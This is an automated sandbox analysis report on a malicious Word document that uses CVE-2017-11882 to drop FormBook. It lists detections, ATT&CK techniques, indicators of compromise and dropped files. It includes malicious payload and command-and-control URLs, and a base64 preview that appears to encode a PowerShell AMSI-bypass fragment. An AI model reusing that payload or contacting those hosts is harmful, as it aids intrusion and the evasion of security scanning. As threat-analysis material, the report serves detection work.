Source: Yara match	File source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00B9041E CreateBindCtx,SysAllocStringByteLen,SysFreeString,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00B91AA2 CreateBindCtx,MkParseDisplayName,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_00B866C1 CoCreateInstance,CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Credential API Hooking1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	Boot or Logon Initialization Scripts	Process Injection712	Scripting1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Credential API Hooking1	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Shared Modules1	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Information Discovery126	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Exploitation for Client Execution33	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Command and Scripting Interpreter111	Rc.common	Rc.common	Rootkit1	Cached Domain Credentials	Security Software Discovery131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Modify Registry1	Proc Filesystem	Virtualization/Sandbox Evasion31	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion31	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection712	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RFQ-CIF DT22.doc	25%	Virustotal		Browse
RFQ-CIF DT22.doc	16%	ReversingLabs	Document-RTF.Trojan.Alien

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.0.calc.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
11.0.calc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
11.2.calc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
11.0.calc.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://schemas.openformatrg/package/2006/content-t	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.milan-sites.com/t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://schemas.open	0%	URL Reputation	safe
http://java.sun.com	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
www.cybocross.com/t1st/	3%	Virustotal		Browse
www.cybocross.com/t1st/	0%	Avira URL Cloud	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.milan-sites.com	47.241.96.113	true	true	unknown
google.com	216.58.215.238	true	false	high
cdn.discordapp.com	162.159.135.233	true	false	high
www.foodcartgps.net	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/915347845752705109/915799206072045578/m.jpg	false		high
http://www.milan-sites.com/t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ	true	Avira URL Cloud: safe	unknown
www.cybocross.com/t1st/	true	3%, Virustotal, Browse Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmp	false		high
http://schemas.openformatrg/package/2006/content-t	WINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.iis.fhg.de/audioPA	explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM	explorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehp2__	explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	false		high
http://treyresearch.net	explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp	false		high
http://schemas.open	WINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	false		high
http://java.sun.com	explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msn.com/?ocid=iehp	explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-de/?ocid=iehp	explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	false		high
http://www.piriform.com/ccleaner	explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	false		high
https://support.mozilla.org	explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	false		high
http://servername/isapibackend.dll	cscript.exe, 00000006.00000002.414747436.0000000001FB0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.241.96.113	www.milan-sites.com	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
162.159.135.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532827
Start date:	02.12.2021
Start time:	18:25:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 55s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	RFQ-CIF DT22.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@12/12@5/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 23.6% (good quality ratio 22.2%) Quality average: 70.2% Quality standard deviation: 29.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:25:20	API Interceptor	27x Sleep call for process: EQNEDT32.EXE modified
18:25:21	API Interceptor	241x Sleep call for process: cscript.exe modified
18:25:23	API Interceptor	336x Sleep call for process: powershell.exe modified
18:25:57	API Interceptor	92x Sleep call for process: calc.exe modified
18:27:03	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.135.233	We7WnoqeXe.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
	mosoxxxHack.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
	Sales-contract-deaho-180521-poweruae.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
	PURCHASE ORDER E3007921.EXE	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
	Waybill Document 22700456.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
	COMPANY REQUIREMENT.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
	Email data form.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
	Down Payment.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	Vessel details.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
	Teklif Rusya 24 09 2020.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
google.com	sv4q1RcC7y.exe	Get hash	malicious	Browse	172.217.168.68
	RFQ - SST#2021111503.exe	Get hash	malicious	Browse	172.217.168.83
	REQUEST FOR SPECIFICATION.exe	Get hash	malicious	Browse	172.217.168.83
	bUSzS84fr4.dll	Get hash	malicious	Browse	216.58.215.238
	DHL Original shipping Document_pdf.ppam	Get hash	malicious	Browse	172.217.168.9
	New Price List.ppam	Get hash	malicious	Browse	172.217.168.9
	Hotel Guest List.ppam	Get hash	malicious	Browse	172.217.168.9
	IRQ2107798.ppam	Get hash	malicious	Browse	172.217.168.9
	AWB.ppam	Get hash	malicious	Browse	172.217.168.9
	NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe	Get hash	malicious	Browse	142.250.203.110
	IRQ2107797.ppam	Get hash	malicious	Browse	172.217.168.9
	lzJWJgZhPc.exe	Get hash	malicious	Browse	142.250.203.110
cdn.discordapp.com	uATT8vAUK9.exe	Get hash	malicious	Browse	162.159.135.233
	1Y0xc70fbX.exe	Get hash	malicious	Browse	162.159.129.233
	Document.exe	Get hash	malicious	Browse	162.159.129.233
	new offers885111832.docx	Get hash	malicious	Browse	162.159.129.233
	new offers885111832.docx	Get hash	malicious	Browse	162.159.134.233
	lifehacks_6582318243.docx	Get hash	malicious	Browse	162.159.134.233
	lifehacks_6582318243.docx	Get hash	malicious	Browse	162.159.130.233
	Narudzba.0953635637.PDF.exe	Get hash	malicious	Browse	162.159.129.233
	Orden de compra.exe	Get hash	malicious	Browse	162.159.133.233
	NOTIFICACION DE CITACION No. 0988-02043-2020. OFICINA DE TALENTO HUMANO.exe	Get hash	malicious	Browse	162.159.133.233
	WK1CQtJu13.exe	Get hash	malicious	Browse	162.159.135.233
	SecuriteInfo.com.Packed-GDV0304D0F07C5D.24466.exe	Get hash	malicious	Browse	162.159.130.233
	SecuriteInfo.com.W32.AIDetect.malware1.19028.exe	Get hash	malicious	Browse	162.159.129.233
	I5TsW8WmSc.exe	Get hash	malicious	Browse	162.159.129.233
	8VvzOu0uHY.exe	Get hash	malicious	Browse	162.159.134.233
	koCttsCjGY.exe	Get hash	malicious	Browse	162.159.130.233
	GenshinHack.exe	Get hash	malicious	Browse	162.159.135.233
	invoice template 33142738819.docx	Get hash	malicious	Browse	162.159.135.233
	exel.exe	Get hash	malicious	Browse	162.159.135.233
	DOC209272621615.PDF.exe	Get hash	malicious	Browse	162.159.129.233

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	RFQ00_3779028392.doc	Get hash	malicious	Browse	162.159.134.233
	aRo4FhRug5.dll	Get hash	malicious	Browse	104.26.2.70
	PaymentReceiptPDF.html	Get hash	malicious	Browse	104.16.19.94
	Milleniumbpc.xlsx	Get hash	malicious	Browse	23.227.38.74
	uATT8vAUK9.exe	Get hash	malicious	Browse	162.159.135.233
	1Y0xc70fbX.exe	Get hash	malicious	Browse	162.159.129.233
	Document.exe	Get hash	malicious	Browse	162.159.129.233
	SecuriteInfo.com.Trojan.PWS.Siggen2.44034.6232.exe	Get hash	malicious	Browse	104.18.74.167
	RFQ - SST#2021111503.exe	Get hash	malicious	Browse	172.67.203.143
	sk4e7kDlkb.exe	Get hash	malicious	Browse	162.159.134.233
	new offers885111832.docx	Get hash	malicious	Browse	162.159.129.233
	ufKi6DmWMQCuEb4.exe	Get hash	malicious	Browse	172.67.167.81
	_0.html	Get hash	malicious	Browse	104.16.19.94
	new offers885111832.docx	Get hash	malicious	Browse	162.159.134.233
	wXvjhk5m3v.html	Get hash	malicious	Browse	104.16.18.94
	lifehacks_6582318243.docx	Get hash	malicious	Browse	162.159.134.233
	'Vm Note'ar_dept On Wed, 01 Dec 2021 220320 +0100.html	Get hash	malicious	Browse	104.16.19.94
	lifehacks_6582318243.docx	Get hash	malicious	Browse	162.159.130.233
	TRANSFER VOUCHER 202101202-PDF.exe	Get hash	malicious	Browse	104.21.19.200
	Narudzba.0953635637.PDF.exe	Get hash	malicious	Browse	23.227.38.74
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	order 4544471372.xls	Get hash	malicious	Browse	149.129.254.152
	order 4544471372.xls	Get hash	malicious	Browse	149.129.254.152
	SecuriteInfo.com.Heur.31616.xls	Get hash	malicious	Browse	149.129.254.152
	SecuriteInfo.com.Heur.26641.xls	Get hash	malicious	Browse	149.129.254.152
	SecuriteInfo.com.Heur.5035.doc	Get hash	malicious	Browse	8.209.79.68
	SecuriteInfo.com.Heur.6074.doc	Get hash	malicious	Browse	8.209.79.68
	plans_48055147646.xls	Get hash	malicious	Browse	149.129.254.152
	plans_48055147646.xls	Get hash	malicious	Browse	149.129.254.152
	SecuriteInfo.com.Heur.31820.doc	Get hash	malicious	Browse	8.209.79.68
	SecuriteInfo.com.Heur.17389.doc	Get hash	malicious	Browse	8.209.79.68
	SecuriteInfo.com.Heur.28256.doc	Get hash	malicious	Browse	8.209.79.68
	invoice template929473689.xls	Get hash	malicious	Browse	149.129.254.152
	invoice template929473689.xls	Get hash	malicious	Browse	149.129.254.152
	variants_589243533.xls	Get hash	malicious	Browse	149.129.254.152
	highlights-40677152292.xls	Get hash	malicious	Browse	149.129.254.152
	variants_589243533.xls	Get hash	malicious	Browse	149.129.254.152
	highlights-40677152292.xls	Get hash	malicious	Browse	149.129.254.152
	variants_8857120413.xls	Get hash	malicious	Browse	149.129.254.152
	variants_8857120413.xls	Get hash	malicious	Browse	149.129.254.152
	payment_4151226701.xls	Get hash	malicious	Browse	149.129.254.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	RFQ00_3779028392.doc	Get hash	malicious	Browse	162.159.135.233
	new offers885111832.docx	Get hash	malicious	Browse	162.159.135.233
	lifehacks_6582318243.docx	Get hash	malicious	Browse	162.159.135.233
	counter-1248368226.xls	Get hash	malicious	Browse	162.159.135.233
	counter-1248368226.xls	Get hash	malicious	Browse	162.159.135.233
	CU-6431 report.xlsm	Get hash	malicious	Browse	162.159.135.233
	DHL Original shipping Document_pdf.ppam	Get hash	malicious	Browse	162.159.135.233
	New Price List.ppam	Get hash	malicious	Browse	162.159.135.233
	SCAN_7295943480515097.xlsm	Get hash	malicious	Browse	162.159.135.233
	Hotel Guest List.ppam	Get hash	malicious	Browse	162.159.135.233
	IRQ2107798.ppam	Get hash	malicious	Browse	162.159.135.233
	AWB.ppam	Get hash	malicious	Browse	162.159.135.233
	FILE_915494026923219.xlsm	Get hash	malicious	Browse	162.159.135.233
	IRQ2107797.ppam	Get hash	malicious	Browse	162.159.135.233
	PaCJ39hC4R.xlsx	Get hash	malicious	Browse	162.159.135.233
	part-1500645108.xlsb	Get hash	malicious	Browse	162.159.135.233
	invoice template 33142738819.docx	Get hash	malicious	Browse	162.159.135.233
	item-40567503.xlsb	Get hash	malicious	Browse	162.159.135.233
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse	162.159.135.233
	item-107262298.xlsb	Get hash	malicious	Browse	162.159.135.233

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\m[1].jpg Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	1920730
Entropy (8bit):	4.744429581128775
Encrypted:	false
SSDEEP:	24576:npBYI4sL/QQX5YfBHzOK+haVIxK5cmZRc7TlD1cpj5:bX5YZHWaVIxK+mHcflD1Il
MD5:	DE726DD453796B237393F7E160EB25E2
SHA1:	AA6FAC0E5EFD84816494AAA746DAA382F571E9B3
SHA-256:	1755604F7786452EE2991D3193193153F4A9F4C4C708204D64B9135CD6F26A3C
SHA-512:	52B02A3E6A17AAF6D84219DDE9D2E1B7BA672FB6F1B03919C6C85D80F9A6C5E6C9C675895A4CFF0EE46FF1AD4802C902DB4F99E7C7B62477645F25A750A25D11
Malicious:	false
Reputation:	low
IE Cache URL:	https://cdn.discordapp.com/attachments/915347845752705109/915799206072045578/m.jpg
Preview:	V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYSA9IFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uQW1zaVV0JysnaWxzJykNCiRoID0gIjQ0NTY2MjUyMjA1NzUyNjMxNzQ0NTI1NTQ4NDciDQokcyA9IFtzdHJpbmddKDAuLjEzfCV7W2NoYXJdW2ludF0oNTMrKCRoKS5zdWJzdHJpbmcoKCRfKjIpLDIpKX0pLXJlcGxhY2UgIiAiDQokYiA9ICRhLkdldEZpZWxkKCRzLCdOb25QdWJsaWMsU3RhdGljJykNCiRiLlNldFZhbHVlKCRudWxsLCR0cnVlKTsgJGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOw0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	4.812816781063635
Encrypted:	false
SSDEEP:	192:7Nvugo5qhwPXk3Ur1yF9q2Jh9tp3F5lQtFQ+:7o4K/k3UrEo2Jh9tpV5lQt+
MD5:	30E8134C66F2CE7C35BD554D66974D08
SHA1:	5ED39A43359A7F2CF00D093B61E658A5F0072D01
SHA-256:	369A7416A65B62AA8A3CC7EB8EFD2C2D8255B3D502931EB7ABFDB359926CDAF4
SHA-512:	6074FB6CC8FBE3E6FC898F8D62E00E186911152AAC831276A94C4B83DC736212F8746BEC53EFA97C52B5811A423F086845CBA99B7DDF510FCF2C4D0F536AA1D3
Malicious:	true
